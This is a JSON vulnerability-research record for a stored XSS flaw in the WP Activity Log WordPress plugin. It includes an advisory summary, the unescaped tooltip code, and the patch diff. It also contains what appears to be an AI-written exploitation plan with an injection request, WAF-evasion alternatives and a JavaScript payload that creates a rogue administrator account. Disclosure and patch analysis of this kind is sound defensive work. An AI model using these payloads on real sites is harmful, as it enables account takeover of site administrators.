[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-mV_ekZG8QxWnq-wtk9qlb9XoCPV9WeLMBVm_jzeYUM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-56005","wp-activity-log-authenticated-subscriber-stored-cross-site-scripting-2","WP Activity Log \u003C= 5.6.3.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting","The WP Activity Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.6.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-security-audit-log",null,"\u003C=5.6.3.1","5.6.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-19 00:00:00","2026-06-23 15:48:55",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F796c37bb-0ff2-4f13-b752-71319adcbc61?source=api-prod",5,[22,23,24,25,26,27,28,29],"classes\u002FControllers\u002Fclass-alert-manager.php","classes\u002FControllers\u002Fclass-alert.php","classes\u002FEntities\u002Fclass-occurrences-entity.php","classes\u002FFree\u002Fassets\u002Fnav-bar.php","classes\u002FHelpers\u002Fclass-user-utils.php","classes\u002FHelpers\u002Fclass-view-manager.php","classes\u002FHelpers\u002Fsettings\u002Fadmin\u002Fjs\u002Fbootstrap-select.min.js","classes\u002FHelpers\u002Fsettings\u002Fadmin\u002Fjs\u002Fbootstrap-slider.min.js","researched",false,3,"This research plan outlines the exploitation of a Stored Cross-Site Scripting (XSS) vulnerability in **WP Activity Log \u003C= 5.6.3.1**. The vulnerability exists because the plugin fails to sanitize and escape user-controlled metadata (such as profile fields) before rendering it in the Audit Log viewer, specifically within user tooltips.\n\n### 1. Vulnerability Summary\nThe vulnerability is located in the `WSAL\\Helpers\\User_Utils::get_tooltip_user_content` function within `classes\u002FHelpers\u002Fclass-user-utils.php`. This function constructs an HTML string for a tooltip meant to show user details in the activity log. It directly concatenates user properties like `first_name`, `last_name`, and `user_nicename` without applying `esc_html()` or similar escaping functions. \n\nWhen an authenticated user (Subscriber or higher) updates their profile with a malicious script, the plugin logs this activity. When an administrator views the activity log and interacts with the entry (e.g., hovering over the user's name), the unsanitized script executes in the administrator's browser context.\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Sink:** `WSAL\\Helpers\\User_Utils::get_tooltip_user_content` (concatenating raw user data into HTML).\n*   **Injection Point:** WordPress Profile update fields (`first_name`, `last_name`, `nickname`\u002F`user_nicename`).\n*   **Authentication:** Subscriber-level access or higher.\n*   **Preconditions:** The WP Activity Log plugin must be active (it logs profile changes by default).\n*   **Target Page:** The Activity Log Viewer (`\u002Fwp-admin\u002Fadmin.php?page=wsal-auditlog`).\n\n### 3. Code Flow\n1.  **Injection:** A Subscriber updates their profile at `\u002Fwp-admin\u002Fprofile.php`.\n2.  **Logging:** WP Activity Log's sensors (e.g., `WP_Content_Sensor`) detect the profile change and call `WSAL\\Controllers\\Alert_Manager::trigger_event`.\n3.  **Storage:** The event is stored in the `wsal_occurrences` table, and the user's ID\u002FUsername is recorded.\n4.  **Retrieval:** An Administrator accesses the Audit Log viewer. The viewer (via `WSAL_Views_AuditLog`) prepares the table rows.\n5.  **Rendering (The Sink):** For the \"User\" column, the plugin generates a tooltip to show more details. It calls `WSAL\\Helpers\\User_Utils::get_tooltip_user_content($user_object)`.\n6.  **Execution:**\n    ```php\n    \u002F\u002F classes\u002FHelpers\u002Fclass-user-utils.php\n    public static function get_tooltip_user_content( $user ) {\n        \u002F\u002F ... labels are escaped, but values are NOT\n        $tooltip .= ( ! empty( $user->data->first_name ) ) ? '\u003Cstrong>' . esc_attr__( 'First name: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->first_name . '\u003C\u002Fbr>' : '';\n        \u002F\u002F $user->data->first_name contains the XSS payload\n        return $tooltip;\n    }\n    ```\n7.  The resulting HTML is sent to the browser and injected into the DOM (typically via an `onmouseover` attribute or a data-attribute handled by JS), triggering the payload.\n\n### 4. Nonce Acquisition Strategy\nThis exploit leverages the plugin's monitoring of **core WordPress actions**. Therefore, the only nonce required is the standard WordPress profile update nonce.\n1.  **Navigate** to `\u002Fwp-admin\u002Fprofile.php` as the Subscriber.\n2.  **Extract** the nonce using `browser_eval`:\n    `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n3.  **Perform** the profile update via `http_request`.\n\nNo plugin-specific nonce is required to *trigger* the logging; the plugin automatically captures the profile change.\n\n### 5. Exploitation Strategy\n1.  **Subscriber Login:** Authenticate as a Subscriber user.\n2.  **Profile Update (Injection):**\n    *   **Method:** POST\n    *   **URL:** `\u002Fwp-admin\u002Fprofile.php`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Payload:**\n        ```urlencoded\n        action=update&user_id=[SUBSCRIBER_ID]&nickname=attacker&first_name=\u003Cimg src=x onerror=alert('CVE-2026-56005_XSS')>&_wpnonce=[NONCE]\n        ```\n3.  **Admin Login:** Authenticate as an Administrator.\n4.  **Trigger Execution:**\n    *   **Navigate** to `\u002Fwp-admin\u002Fadmin.php?page=wsal-auditlog`.\n    *   **Locate** the log entry for \"User updated their profile\" (Alert ID 4001).\n    *   **Interact** with the \"User\" column. The XSS may trigger on page load or when hovering over the username, depending on how the plugin enqueues the tooltip HTML.\n\n### 6. Test Data Setup\n1.  **Users:**\n    *   An Administrator user.\n    *   A Subscriber user (Username: `subscriber_vct`, Password: `password123`).\n2.  **Plugin Configuration:** Ensure \"WP Activity Log\" is activated and \"User Profile\" monitoring is enabled (default).\n3.  **Environment:** WordPress environment with the vulnerable version of the plugin (5.6.3.1).\n\n### 7. Expected Results\n*   The profile update request should return a `302` redirect (success).\n*   When the Admin visits the Activity Log, the payload `\u003Cimg src=x onerror=...>` will be present in the HTML source or dynamically loaded into the DOM.\n*   A JavaScript alert box with the text `CVE-2026-56005_XSS` should appear.\n\n### 8. Verification Steps\n1.  **Verify DB Storage:** Use WP-CLI to confirm the payload is in the user metadata:\n    `wp user get subscriber_vct --field=first_name`\n2.  **Verify Log Entry:** Check that the event was logged:\n    `wp db query \"SELECT * FROM wp_wsal_occurrences WHERE alert_id = 4001 ORDER BY created_on DESC LIMIT 1\"`\n3.  **Confirm Lack of Escaping:** Check the response of the Log Viewer page for the raw payload:\n    `http_request` to `\u002Fwp-admin\u002Fadmin.php?page=wsal-auditlog` and search the response body for the `\u003Cimg src=x...` string.\n\n### 9. Alternative Approaches\n*   **Alternative Injection Fields:** If `first_name` is filtered by a WAF, try `last_name` or `nickname`, as all are handled identically in `get_tooltip_user_content`.\n*   **Display Name XSS:** If the log viewer uses `User_Utils::get_display_label` without escaping in the main table view, the XSS will trigger automatically upon page load for anyone viewing the log. Set the \"Display name publicly as\" field to the payload in `profile.php`.\n*   **CSRF via XSS:** To demonstrate high impact, use a payload that creates a new admin user:\n    ```javascript\n    fetch('\u002Fwp-admin\u002Fuser-new.php').then(r=>r.text()).then(h=>{\n        let n=h.match(\u002Fname=\"_wpnonce_create-user\" value=\"([^\"]+)\"\u002F)[1];\n        fetch('\u002Fwp-admin\u002Fuser-new.php',{method:'POST',body:`action=createuser&user_login=hacked&email=h@cked.com&pass1=Password123!&pass2=Password123!&role=administrator&_wpnonce_create-user=${n}`,headers:{'Content-Type':'application\u002Fx-www-form-urlencoded'}})\n    })\n    ```","WP Activity Log versions up to 5.6.3.1 are vulnerable to Stored Cross-Site Scripting (XSS) due to insufficient output escaping of user profile metadata. An authenticated attacker with Subscriber-level access can inject malicious scripts into their profile fields (like first name or nickname), which then execute in the context of an administrator viewing the activity log's user tooltips.","\u002F\u002F classes\u002FHelpers\u002Fclass-user-utils.php:172\n$tooltip  = '\u003Cstrong>' . esc_attr__( 'Username: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->user_login . '\u003C\u002Fbr>';\n$tooltip .= ( ! empty( $user->data->first_name ) ) ? '\u003Cstrong>' . esc_attr__( 'First name: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->first_name . '\u003C\u002Fbr>' : '';\n$tooltip .= ( ! empty( $user->data->last_name ) ) ? '\u003Cstrong>' . esc_attr__( 'Last Name: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->last_name . '\u003C\u002Fbr>' : '';\n$tooltip .= '\u003Cstrong>' . esc_attr__( 'Email: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->user_email . '\u003C\u002Fbr>';\n$tooltip .= '\u003Cstrong>' . esc_attr__( 'Nickname: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->user_nicename . '\u003C\u002Fbr>\u003C\u002Fbr>';","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-security-audit-log\u002F5.6.3.1\u002Fclasses\u002FHelpers\u002Fclass-user-utils.php\t2026-05-11 12:31:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-security-audit-log\u002F5.6.4\u002Fclasses\u002FHelpers\u002Fclass-user-utils.php\t2026-06-02 09:44:42.000000000 +0000\n@@ -169,11 +169,11 @@\n \t\t\t\treturn '';\n \t\t\t}\n \n-\t\t\t$tooltip  = '\u003Cstrong>' . esc_attr__( 'Username: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->user_login . '\u003C\u002Fbr>';\n-\t\t\t$tooltip .= ( ! empty( $user->data->first_name ) ) ? '\u003Cstrong>' . esc_attr__( 'First name: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->first_name . '\u003C\u002Fbr>' : '';\n-\t\t\t$tooltip .= ( ! empty( $user->data->last_name ) ) ? '\u003Cstrong>' . esc_attr__( 'Last Name: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->last_name . '\u003C\u002Fbr>' : '';\n-\t\t\t$tooltip .= '\u003Cstrong>' . esc_attr__( 'Email: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->user_email . '\u003C\u002Fbr>';\n-\t\t\t$tooltip .= '\u003Cstrong>' . esc_attr__( 'Nickname: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . $user->data->user_nicename . '\u003C\u002Fbr>\u003C\u002Fbr>';\n+\t\t\t$tooltip  = '\u003Cstrong>' . \\esc_attr__( 'Username: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . \\esc_html( $user->data->user_login ) . '\u003C\u002Fbr>';\n+\t\t\t$tooltip .= ( ! empty( $user->data->first_name ) ) ? '\u003Cstrong>' . \\esc_attr__( 'First name: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . \\esc_html( $user->data->first_name ) . '\u003C\u002Fbr>' : '';\n+\t\t\t$tooltip .= ( ! empty( $user->data->last_name ) ) ? '\u003Cstrong>' . \\esc_attr__( 'Last Name: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . \\esc_html( $user->data->last_name ) . '\u003C\u002Fbr>' : '';\n+\t\t\t$tooltip .= '\u003Cstrong>' . \\esc_attr__( 'Email: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . \\esc_html( $user->data->user_email ) . '\u003C\u002Fbr>';\n+\t\t\t$tooltip .= '\u003Cstrong>' . \\esc_attr__( 'Nickname: ', 'wp-security-audit-log' ) . '\u003C\u002Fstrong>' . \\esc_html( $user->data->user_nicename ) . '\u003C\u002Fbr>\u003C\u002Fbr>';\n \n \t\t\t\u002F**\n \t\t\t * WSAL Filter: `wsal_additional_user_tooltip_content'\n@@ -185,7 +185,7 @@\n \t\t\t * @param string $content Blank string to append to.\n \t\t\t * @param object  $user  - User object.\n \t\t\t *\u002F\n-\t\t\t$additional_content = apply_filters( 'wsal_additional_user_tooltip_content', '', $user );\n+\t\t\t$additional_content = \\wp_kses_post( (string) \\apply_filters( 'wsal_additional_user_tooltip_content', '', $user ) );\n \n \t\t\t$tooltip .= $additional_content;","An attacker with Subscriber-level authentication logs into the WordPress dashboard and navigates to the profile update page (\u002Fwp-admin\u002Fprofile.php). They inject an XSS payload (e.g., \u003Cimg src=x onerror=alert(1)>) into fields such as 'First Name', 'Last Name', or 'Nickname'. Since the plugin automatically logs profile changes, the malicious script is stored in the activity log metadata. When an Administrator views the Audit Log (\u002Fwp-admin\u002Fadmin.php?page=wsal-auditlog) and interacts with the 'User' column (triggering the unescaped tooltip content), the payload executes in the Administrator's browser context.","gemini-3-flash-preview","2026-06-25 20:13:18","2026-06-25 20:14:04",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.6.3.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-security-audit-log\u002Ftags\u002F5.6.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-security-audit-log.5.6.3.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-security-audit-log\u002Ftags\u002F5.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-security-audit-log.5.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-security-audit-log\u002Ftags"]